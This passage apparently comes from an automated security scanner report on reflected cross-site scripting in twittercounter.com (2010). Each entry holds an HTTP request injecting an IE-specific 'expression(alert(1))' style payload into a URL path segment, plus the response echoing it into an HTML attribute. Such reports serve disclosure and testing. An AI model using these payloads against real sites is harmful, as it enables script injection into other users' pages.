GET /steverubel8cd6d"style%3d"x%3aexpression(alert(1))"71983893dab HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:20 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23708
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/steverubel8cd6d"style="x:expression(alert(1))"71983893dab" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41114"style%3d"x%3aexpression(alert(1))"0c4b5f67749 was submitted in the REST URL parameter 1. This input was echoed as 41114"style="x:expression(alert(1))"0c4b5f67749 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /style.css41114"style%3d"x%3aexpression(alert(1))"0c4b5f67749 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:17:50 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/style.css41114"style="x:expression(alert(1))"0c4b5f67749" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b244e"style%3d"x%3aexpression(alert(1))"35c1d7aa24d was submitted in the REST URL parameter 1. This input was echoed as b244e"style="x:expression(alert(1))"35c1d7aa24d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /taylorswift13b244e"style%3d"x%3aexpression(alert(1))"35c1d7aa24d HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:23 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23737
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/taylorswift13b244e"style="x:expression(alert(1))"35c1d7aa24d" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b1c"style%3d"x%3aexpression(alert(1))"d67bef6d3e0 was submitted in the REST URL parameter 1. This input was echoed as 18b1c"style="x:expression(alert(1))"d67bef6d3e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /tecg118b1c"style%3d"x%3aexpression(alert(1))"d67bef6d3e0 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:21 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/tecg118b1c"style="x:expression(alert(1))"d67bef6d3e0" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbfdc"style%3d"x%3aexpression(alert(1))"eea93fa163c was submitted in the REST URL parameter 1. This input was echoed as cbfdc"style="x:expression(alert(1))"eea93fa163c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /therobrosecbfdc"style%3d"x%3aexpression(alert(1))"eea93fa163c HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:48 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/therobrosecbfdc"style="x:expression(alert(1))"eea93fa163c" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6d3f"style%3d"x%3aexpression(alert(1))"5b352e8eccd was submitted in the REST URL parameter 1. This input was echoed as e6d3f"style="x:expression(alert(1))"5b352e8eccd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /thomaspowere6d3f"style%3d"x%3aexpression(alert(1))"5b352e8eccd HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:03 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23857
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/thomaspowere6d3f"style="x:expression(alert(1))"5b352e8eccd" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97ad3"style%3d"x%3aexpression(alert(1))"c1c59d302fe was submitted in the REST URL parameter 1. This input was echoed as 97ad3"style="x:expression(alert(1))"c1c59d302fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /trenttsd97ad3"style%3d"x%3aexpression(alert(1))"c1c59d302fe HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:47 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/trenttsd97ad3"style="x:expression(alert(1))"c1c59d302fe" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be180"style%3d"x%3aexpression(alert(1))"92c01775abb was submitted in the REST URL parameter 1. This input was echoed as be180"style="x:expression(alert(1))"92c01775abb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /twitterbe180"style%3d"x%3aexpression(alert(1))"92c01775abb HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:22 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23692
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/twitterbe180"style="x:expression(alert(1))"92c01775abb" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9b3f"style%3d"x%3aexpression(alert(1))"b20315b91d4 was submitted in the REST URL parameter 1. This input was echoed as d9b3f"style="x:expression(alert(1))"b20315b91d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /twitterd9b3f"style%3d"x%3aexpression(alert(1))"b20315b91d4/list/team HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:52 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12910
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/twitterd9b3f"style="x:expression(alert(1))"b20315b91d4/list/team" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2cf"style%3d"x%3aexpression(alert(1))"7c42b07d360 was submitted in the REST URL parameter 2. This input was echoed as 9a2cf"style="x:expression(alert(1))"7c42b07d360 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /twitter/list9a2cf"style%3d"x%3aexpression(alert(1))"7c42b07d360/team HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:55 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22486
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/twitter/list9a2cf"style="x:expression(alert(1))"7c42b07d360/team" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f87d"style%3d"x%3aexpression(alert(1))"ca0eab90c85 was submitted in the REST URL parameter 3. This input was echoed as 2f87d"style="x:expression(alert(1))"ca0eab90c85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /twitter/list/team2f87d"style%3d"x%3aexpression(alert(1))"ca0eab90c85 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:25:03 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/twitter/list/team2f87d"style="x:expression(alert(1))"ca0eab90c85" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c42"style%3d"x%3aexpression(alert(1))"98aaec9c226 was submitted in the REST URL parameter 1. This input was echoed as f3c42"style="x:expression(alert(1))"98aaec9c226 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /vagamundof3c42"style%3d"x%3aexpression(alert(1))"98aaec9c226?from=widget&v=2 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:29:49 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/vagamundof3c42"style="x:expression(alert(1))"98aaec9c226" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9379"style%3d"x%3aexpression(alert(1))"c9a8407356f was submitted in the REST URL parameter 1. This input was echoed as a9379"style="x:expression(alert(1))"c9a8407356f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /verifieda9379"style%3d"x%3aexpression(alert(1))"c9a8407356f HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:46 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23686
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/verifieda9379"style="x:expression(alert(1))"c9a8407356f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83de5"style%3d"x%3aexpression(alert(1))"22894449904 was submitted in the REST URL parameter 1. This input was echoed as 83de5"style="x:expression(alert(1))"22894449904 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /verified83de5"style%3d"x%3aexpression(alert(1))"22894449904/list/olympians HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:24 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12896
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/verified83de5"style="x:expression(alert(1))"22894449904/list/olympians" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ee7"style%3d"x%3aexpression(alert(1))"02637477335 was submitted in the REST URL parameter 2. This input was echoed as 44ee7"style="x:expression(alert(1))"02637477335 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /verified/list44ee7"style%3d"x%3aexpression(alert(1))"02637477335/olympians HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:27 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22534
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/verified/list44ee7"style="x:expression(alert(1))"02637477335/olympians" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f5ce"style%3d"x%3aexpression(alert(1))"60eebba913e was submitted in the REST URL parameter 3. This input was echoed as 5f5ce"style="x:expression(alert(1))"60eebba913e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /verified/list/olympians5f5ce"style%3d"x%3aexpression(alert(1))"60eebba913e HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:26:31 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12197
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/verified/list/olympians5f5ce"style="x:expression(alert(1))"60eebba913e" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffdf1"style%3d"x%3aexpression(alert(1))"8fe38d1b564 was submitted in the REST URL parameter 1. This input was echoed as ffdf1"style="x:expression(alert(1))"8fe38d1b564 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /verifiedffdf1"style%3d"x%3aexpression(alert(1))"8fe38d1b564/list/world-leaders HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:40 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12868
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/verifiedffdf1"style="x:expression(alert(1))"8fe38d1b564/list/world-leaders" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da6c3"style%3d"x%3aexpression(alert(1))"9a2f32d5dd8 was submitted in the REST URL parameter 2. This input was echoed as da6c3"style="x:expression(alert(1))"9a2f32d5dd8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /verified/listda6c3"style%3d"x%3aexpression(alert(1))"9a2f32d5dd8/world-leaders HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:24:44 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 22548
